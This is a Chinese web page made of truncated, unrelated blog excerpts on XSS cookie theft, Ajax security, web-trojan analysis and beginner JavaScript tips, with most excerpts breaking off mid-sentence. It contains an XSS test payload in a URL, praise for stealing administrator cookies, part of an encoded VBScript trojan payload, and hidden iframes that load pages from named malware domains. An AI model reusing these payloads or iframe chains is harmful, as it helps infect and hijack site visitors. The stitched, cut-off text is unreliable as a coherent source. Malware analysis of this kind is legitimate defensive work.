首先申明，这篇不是我的原创，是我由一篇文章加入了很多自己的见解。原文作者不知道被哪个没素质的把版权去掉了，到我手上已经是一盗再盗了~~~    所以本文没有版权信息

modified by: http://hi.baidu.com/biweilun

这段时间Javascript搞得很火，一些新的技术也被挖掘出来，比如html文件居然可以提交参数了。大家看到如下的URL应该不陌生：http://www.baidu.com/index.asp?ID=334   当然，这并不是真实的URL，只是Trajon.BWL举的一个假例

Author：http://hi.baidu.com/biweilun

XSS，现在都成热门词了，跨来跨去都是alert，无聊~~     其实alert()不能排除是一种检测方式，很实用，呵呵。跨站跨到Cookies才是正道，如果网站系统有Cookie欺骗漏洞的话那就非常妙了，直接跨到管理员的Cookie一下子就能登陆后台，拿到权限比较爽。

虚构测试URL：http://hi.baidu.com/biweilun/cgi-bin/Articles.cgi?ID=<script>alert('biweilun')</script>

如果这样能弹出一个框框的

JavaScript包含的Ajax是Web2.0应用的一个重要组成部分。该部分的进化发展使网络变成了超级平台。该转变同时也催生了新品种的病毒和蠕虫，比如Yamanner,Samy 以及Spaceflash等等。Google,Netflix,Yahoo 以及MySpace等门户网站在过去的几个月里都因为新的漏洞而蒙受一定损失。黑客们可以利用这些漏洞进行钓鱼，跨站点脚本(XSS)以及跨站点伪造(XSRF)请求等攻击。

Ajax中没有固

在孟岩老师11月21日的blog中说他惊艳于微软公司新近推出的界面开发工具Expression，并且预言基于Web标准(通常即XHTML+CSS+JavaScript)的界面开发技术很快就会没落。孟岩预测:“最迟不超过2008年，在WPF、Flash(Apollo)等RIA技术的夹攻之下，越来越多的Web应用将同时部署传统Web页面和新的RIA UI。”

对于这个预测，我和一些朋友认为孟岩老师过于乐观了。我预测至少到2010年，基于Web标准的界面开发技术仍然将是Web界面开发的主流技术，而这些技术的集大成者就是Ajax。Ajax技术在最近两年中取得了很大的发展，并

今天去脚本之家看东西，机子上装的AVAST突然爆出来说有网页病毒，vbscript的

郁闷，马上拿出httpdebug来查看源代码，居然怎么也看不了，只好抄起自己写的一个破烂玩意来看源代码了，还真看到了：

如下是一段网马

<Script Language="VBScript">
Cn911="83,61,34,52,70,54,69,50,48,52,53,55,50,55,50,54,70,55,50,50,48,53,50,54,53,55,51,55,53,54,68,54,53,50,48,52,69,54,53,55,56,55,52,48,68,48,65,52,51,54,69,52,67,53,50,53,53,51,68,50,50,54,56,55,52,55,52,55,48,51,65,50,70,50,70,55,55,55,55,55,55,50,69,54,66,55,50,55,54,54,66,55,50,50,69,54,51,54,70,54,68,50,70,55,55,54,70,55,50,54,68,50,69,54,53,55,56,54,53,50,50,48,68,48,65,53,51,54,53,55,52,50,48,52,70,54,

这什么世道啊，连cnBeta都被黑了并挂了马，不过那位的水平还真是厉害呀！分析下

挂马框架 http://www.wofafa.info/hao4.htm   里面又内嵌了个 http://www.wofafa.info/web/index.htm

继续内嵌 ：

<iframe width=100 height=1 frameborder=0 scrolling=no src="http://aaa.gamesky.info/web/real.htm"></iframe>
<iframe width=100 height=1 frameborder=0 scrolling=no src="

网马加密中，目前有个function(p,a,c,k,e,d)的，非常讨厌，我也是深恶痛绝，记得我刚开始碰到它的时候，拼命地读函数，那个叫痛苦啊，磕磕绊绊地勉强搞了出来。今天，突然看见了function(p,a,c,k,e,d)的解密代码，高兴都来不及

<script>
a=62;
function encode() {
var code = document.getElementById('code').value;
code = code.replace(/[\r\n]+/g, '');
code = code.replace(/'/g, "\\'");
var tmp = code.match(/\b(\w+)\b/g);
tmp.so

给初学者补习下挺好：

1.document.write(""); 输出语句
2.JS中的注释为//
3.传统的HTML文档顺序是:document->html->(head,body)
4.一个浏览器窗口中的DOM顺序是:window->(navigator,screen,history,location,document)
5.得到表单中元素的名称和值:document.getElementById("表单中元素的ID号").name(或value)
6.一个小写转大写的JS: document.getElementById("output").value = document.getElementById("input").value.toUpperCase();
7.JS